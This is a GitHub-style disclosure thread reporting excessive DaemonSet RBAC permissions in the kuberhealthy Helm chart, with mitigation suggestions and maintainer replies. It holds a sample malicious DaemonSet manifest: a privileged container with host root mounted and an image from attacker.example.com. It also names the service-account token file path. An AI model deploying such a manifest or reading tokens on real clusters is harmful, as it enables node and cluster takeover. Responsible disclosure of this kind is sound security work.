Hi community! Our team just found a possible security issue when reading the code. We would like to discuss whether it is a real vulnerability.
Description
The bug is that the Deployment kuberhealthy in the charts is granted more RBAC permissions than it needs, which may cause security problems; in the worst case, the cluster could be hijacked. The problem is that kuberhealthy is bound to a ClusterRole (clusterrole.yaml#L5) with the following sensitive permissions:
create/patch/update verb of the daemonsets resource (ClusterRole)
After reading the source code of kuberhealthy, I didn't find any Kubernetes API usage of these permissions. However, these unused permissions carry potential risk:
create/patch/update verb of the daemonsets resource (ClusterRole)
A malicious user can create a privileged container using a malicious image capable of container escape. This would allow them to gain root privileges on the worker node where the container is deployed. Since a DaemonSet schedules a pod on every eligible node by default, and the malicious user can further control the scheduling parameters (e.g., node affinity, tolerations, …), they should be able to deploy the malicious container to every (or almost every) worker node. This means the malicious user would be able to control every (or almost every) worker node in the cluster.
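As an illustration of this risk (the names and image below are hypothetical), the create verb on daemonsets is enough to submit a manifest along these lines; note that a DaemonSet places one pod on every schedulable node by design:

```yaml
# Hypothetical malicious DaemonSet: privileged container with the
# node's root filesystem mounted. Names and image are placeholders.
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: innocuous-looking-agent      # hypothetical name
  namespace: kube-system
spec:
  selector:
    matchLabels:
      app: innocuous-looking-agent
  template:
    metadata:
      labels:
        app: innocuous-looking-agent
    spec:
      hostPID: true                  # see the host's process table
      containers:
        - name: agent
          image: attacker.example.com/escape:latest  # hypothetical image
          securityContext:
            privileged: true         # full device and capability access
          volumeMounts:
            - name: host-root
              mountPath: /host
      volumes:
        - name: host-root
          hostPath:
            path: /                  # the node's root filesystem
```

Because the DaemonSet controller itself creates the pods on every node, the attacker never needs direct pod-creation permissions.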
A malicious user only needs to obtain the service account token to perform the above attack. Several ways to achieve this have already been reported in the real world:
Supply chain attacks: like the recent xz backdoor. The attacker only needs to read /var/run/secrets/kubernetes.io/serviceaccount/token.
RCE vulnerability in the app: any remote-code-execution vulnerability that can read local files can achieve this.
Mitigation Suggestion
Create a separate service account and remove all the unnecessary permissions
Write Kyverno or OPA/Gatekeeper policies to:
Limit the container image, entrypoint, and command of newly created pods. This would effectively prevent the creation of malicious containers.
Restrict the securityContext of newly created pods, especially enforcing securityContext.privileged and securityContext.allowPrivilegeEscalation to false. This would prevent the attacker from escaping the malicious container. In older Kubernetes versions, PodSecurityPolicy could also be used to achieve this (it was deprecated in v1.21 and removed in v1.25).
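For the first suggestion, a least-privilege ClusterRole could look like the sketch below. The resource and verb lists here are illustrative only; the real list must come from an audit of the API calls the kuberhealthy Deployment actually makes:

```yaml
# Illustrative least-privilege ClusterRole for the kuberhealthy
# Deployment. The resources/verbs shown are an assumption, not the
# result of a full audit of cmd/kuberhealthy/main.go.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: kuberhealthy
rules:
  - apiGroups: ["apps"]
    resources: ["daemonsets"]
    verbs: ["get", "list", "watch"]   # drop create/patch/update
```

Combining this with a dedicated service account (rather than a shared one) keeps the blast radius of a leaked token small.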
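For the securityContext suggestion, a minimal Kyverno sketch could look like the following. The policy name is a placeholder, and the pattern anchors should be double-checked against the Kyverno documentation before use:

```yaml
# Hypothetical Kyverno ClusterPolicy rejecting pods whose containers
# request privileged mode or privilege escalation.
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: disallow-privileged-pods     # placeholder name
spec:
  validationFailureAction: Enforce
  rules:
    - name: check-privileged
      match:
        any:
          - resources:
              kinds: ["Pod"]
      validate:
        message: "Privileged containers and privilege escalation are not allowed."
        pattern:
          spec:
            containers:
              # =(...) is Kyverno's conditional anchor: if the field is
              # present, it must match the given value.
              - =(securityContext):
                  =(privileged): "false"
                  =(allowPrivilegeEscalation): "false"
```

An equivalent OPA/Gatekeeper constraint, or the built-in Pod Security Admission "restricted" level on newer clusters, would serve the same purpose.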
A Few Questions
Are these permissions really unused by kuberhealthy?
Would these mitigation suggestions be applicable to kuberhealthy?
Our team has also found other unnecessary permissions (not as sensitive as the above, but they could also cause security issues). Please let us know if you are interested. We'll be happy to share them or open a PR with a fix.
References
Several CVEs have already been assigned in other projects for similar issues:
Hi community:
I noticed that this issue hasn't been answered yet; please feel free to let me know if you need more information. Our team is happy to cooperate and do what we can to resolve this issue.
@peschmae Thank you for reminding us of this! During our check we did find that the daemonset create verb is used here. However, after a more detailed inspection, we found that this function is only called by cmd/daemonset-check/main.go, not by cmd/deployment-check/main.go or cmd/kuberhealthy/main.go. Therefore, we only reported the issue for the Deployment kuberhealthy.
How did you check the code? Was that done automatically?
We wrote a tool that matches the APIs for all resource operations in the controller-runtime and client-go SDKs, and then checks whether each one is used by a workload. We manually verified every permission we reported.